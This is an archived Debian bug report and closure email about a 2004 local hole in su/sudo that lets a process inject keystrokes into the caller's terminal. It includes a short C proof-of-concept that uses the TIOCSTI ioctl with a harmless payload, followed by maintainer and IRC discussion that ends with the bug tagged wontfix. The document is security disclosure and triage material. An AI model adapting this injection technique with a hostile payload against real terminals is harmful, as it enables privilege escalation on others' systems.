[Pkg-shadow-devel] Bug#262455: marked as done ([EXPERT] login: su,
sudo, super: Local security hole -- arbitrary character injection)
Debian Bug Tracking System
owner at bugs.debian.org
Sun Sep 11 10:33:34 UTC 2005
Your message dated Sun, 11 Sep 2005 12:31:06 +0200
with message-id <20050911103105.GI11006 at mykerinos.kheops.frmug.org>
and subject line Bug 262453: Marking one of these bugs as wontfix and closing one of both as duplicate
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 31 Jul 2004 02:22:14 +0000
>From jjminar at fastmail.fm Fri Jul 30 19:22:14 2004
Return-path: <jjminar at fastmail.fm>
Received: from relay.inway.cz [212.24.128.3]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1BqjVl-0001V2-00; Fri, 30 Jul 2004 19:22:14 -0700
Received: from localhost (localhost [127.0.0.1])
by relay.inway.cz (Postfix) with ESMTP id E69D3179DAA
for <submit at bugs.debian.org>; Sat, 31 Jul 2004 04:22:12 +0200 (CEST)
Received: from mail.haltyr.dejvice.czf (snat2.arachne.czfree.net [212.24.150.227])
by relay.inway.cz (Postfix) with ESMTP id 3863D179CDC
for <submit at bugs.debian.org>; Sat, 31 Jul 2004 04:22:12 +0200 (CEST)
Received: by mail.haltyr.dejvice.czf (Postfix, from userid 1000)
id B3BFE4892; Sat, 31 Jul 2004 04:18:11 +0200 (CEST)
Date: Sat, 31 Jul 2004 04:18:11 +0200
From: Jan Minar <jjminar at fastmail.fm>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: login: su, sudo: Local security hole -- arbitrary character injection
Message-ID: <20040731021811.GA28670 at kontryhel.haltyr.dyndns.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="oLBj+sq0vYjzfsbl"
Content-Disposition: inline
In-Reply-To: <200407261453.56729.russell at coker.com.au>
User-Agent: Mutt/1.3.28i
X-Reportbug-Version: 1.50
Delivered-To: submit at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no
version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level:
--oLBj+sq0vYjzfsbl
Content-Type: multipart/mixed; boundary="yrj/dFKFPuw6o+aM"
Content-Disposition: inline
--yrj/dFKFPuw6o+aM
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Package: login
Version: 20000902-12
Severity: critical
Justification: root security hole
Tags: security
Hi.
As Russell Coker pointed out in
[1]<200407261453.56729.russell at coker.com.au>, there is a flaw in su &
sudo which allows the attacker to staff arbitrary characters into the
caller's keyboard buffer.
[1] http://lists.debian.org/debian-security/2004/07/msg00181.html
Because the file descriptor(s) pointing to the tty aren't closed, and
the su/sudo process is not a session leader:
> [...] any other code running in the same UID could take over the
> process via ptrace, fork off a child process that inherits the
> administrator tty, and then stuff characters into the keyboard buffer
> with ioctl(fd,TIOCSTI,&c) [...]
Note that there are some programs that are routinely run this way, such
as /etc/init.d/* .
Even worse, su/sudo can't be used as a sandboxing/privilege separation
tool, as a malicious code could be *written* to exploit this loophole.
Also, once the remote attacker has taken the control of the service,
s/he can inject keystrokes, too. Simply put, the process being run
using su/sudo shouldn't have any access to your tty in the first place.
Also, allowing ptrace()ing of processes run with su/sudo opens the door
to various scams and program output manipulation which wouldn't be
possible if the caller run the program under his/her UID.
Please find the enclosed proof-of-concept.
Cheers,
Jan
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.26-jan #6 SMP Tue Jul 27 21:24:30 CEST 2004 i686
Locale: LANG=3DC, LC_CTYPE=3Dcs_CZ.ISO-8859-2
Versions of packages login depends on:
ii libc6 2.2.5-11.5 GNU C Library: Shared librarie=
s an
ii libpam-modules 0.72-35 Pluggable Authentication Modul=
es f
ii libpam0g 0.72-35 Pluggable Authentication Modul=
es l
--=20
"To me, clowns aren't funny. In fact, they're kind of scary. I've wonder=
ed
where this started and I think it goes back to the time I went to the circ=
us,
and a clown killed my dad."
--yrj/dFKFPuw6o+aM
Content-Type: text/x-csrc; charset=us-ascii
Content-Disposition: attachment; filename="su-sploit-poc.c"
Content-Transfer-Encoding: quoted-printable
/*
* sploit-poc.c -- su/sudo arbitrary character injection POC=20
*
* Usage:
* % gcc -o su-sploit-poc su-sploit-poc.c
* % su <user> -c ./su-sploit-poc&
* % sudo -u <user> ./su-sploit-poc&
*/
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/types.h>
int
main (void) {
char *payload =3D "date\necho 'Hello, world!'";
int c, i;
pid_t pid;
if ((pid =3D fork()) =3D=3D 0) {
return 0;
} else if (pid =3D=3D -1) {
perror ("Can't fork");
return 1;
} else {
sleep (1);
/* Keep stuffing characters into the keyboard buffer... */
for (i=3D0; (c =3D payload[i]) !=3D '\0'; i++) {
if (ioctl (0, TIOCSTI, &c) =3D=3D -1) {
perror ("ioctl() failed");
return 1;
}
}
}
return 0;
}
--yrj/dFKFPuw6o+aM--
--oLBj+sq0vYjzfsbl
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFBCwFj+uczK20Fa5cRAqJfAJ0XtWn7GV/X3a0srrLuU6/wfyGxuACglimg
ijAMnwoxElEwLMvHGRiP5ps=
=SlEc
-----END PGP SIGNATURE-----
--oLBj+sq0vYjzfsbl--
---------------------------------------
Received: (at 262455-done) by bugs.debian.org; 11 Sep 2005 10:31:39 +0000
>From bubulle at kheops.frmug.org Sun Sep 11 03:31:39 2005
Return-path: <bubulle at kheops.frmug.org>
Received: from perrier.eu.org (kheops.perrier.eu.org) [81.56.227.253]
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EEP7a-00023J-00; Sun, 11 Sep 2005 03:31:39 -0700
Received: from localhost (localhost [127.0.0.1])
by kheops.perrier.eu.org (Postfix) with ESMTP id 496EF4F977;
Sun, 11 Sep 2005 12:31:07 +0200 (CEST)
Received: from kheops.perrier.eu.org ([127.0.0.1])
by localhost (kheops [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id 02450-06; Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Received: from mykerinos.kheops.frmug.org (mykerinos.kheops.frmug.org [192.168.1.3])
by kheops.perrier.eu.org (Postfix) with ESMTP id 791C34F899;
Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Received: by mykerinos.kheops.frmug.org (Postfix, from userid 7426)
id 478CD2325E; Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Date: Sun, 11 Sep 2005 12:31:06 +0200
From: Christian Perrier <bubulle at debian.org>
To: Tomasz =?utf-8?Q?K=C5=82oczko?= <kloczek at zie.pg.gda.pl>
Cc: 262453-forwarded at bugs.debian.org, 262455-done at bugs.debian.org
Subject: Bug 262453: Marking one of these bugs as wontfix and closing one of both as duplicate
Message-ID: <20050911103105.GI11006 at mykerinos.kheops.frmug.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Disposition: inline
User-Agent: Mutt/1.5.10i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at kheops.frmug.org
Content-Transfer-Encoding: quoted-printable
Delivered-To: 262455-done at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-5.0 required=4.0 tests=BAYES_00,VALID_BTS_CONTROL
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 2
severity 262453 normal
tags 262453 wontfix
thanks
Tomasz, at least could you have a look at http://bugs.debian.org/cgi-bin/=
bugreport.cgi?bug=3D262453=A0?
All advices in these bug logs actually show that su/sudo is probably
not the right place to fix the issue.
Having no clue about the right place to fix this, I hereby close one
of the bugs. The other one will probably seat forever in passwd bug
log, unless Tomasz fixes it upstream.
As this may be unlikely, I tag the bug as "wontfix". At least, for
sure, we won't fix this alone in the Debian package.
Last comments from IRC:
11:52 < rleigh> bubulle: It's not something I'm all that familiar with, b=
ut it seems somewhat
theoretical: if you are the same UID, you could ptrace() =
in any case. I can't see
it being possible to fix in su/sudo, because the most com=
mon use cases involve
being part of an existing sesion (no setsid() allowed) an=
d being either interactive
or at least requiring stdin/stdout/stderr (so the file de=
scriptors can't be
closed). It looks like it could be fixed in
11:52 < rleigh> start-stop-daemon, though. For the others, I think it ne=
eds fixing in the init
scripts so it's not vulnerable to start with.
11:57 < bubulle> well given that advice and mdz comments in the bug log I=
'm very tempted to
actually close these bugs as "rhetorical" nitpicking
12:01 < rleigh> bubulle: I'm not saying it's not exploitable, but I don't=
think su/sudo is the
right place to fix it, unless (for example) you added an =
option to tell it it was
running in "daemon mode", in which case it would be safe =
to setsid() and clean up
the file descriptors.
--=20
More information about the Pkg-shadow-devel
mailing list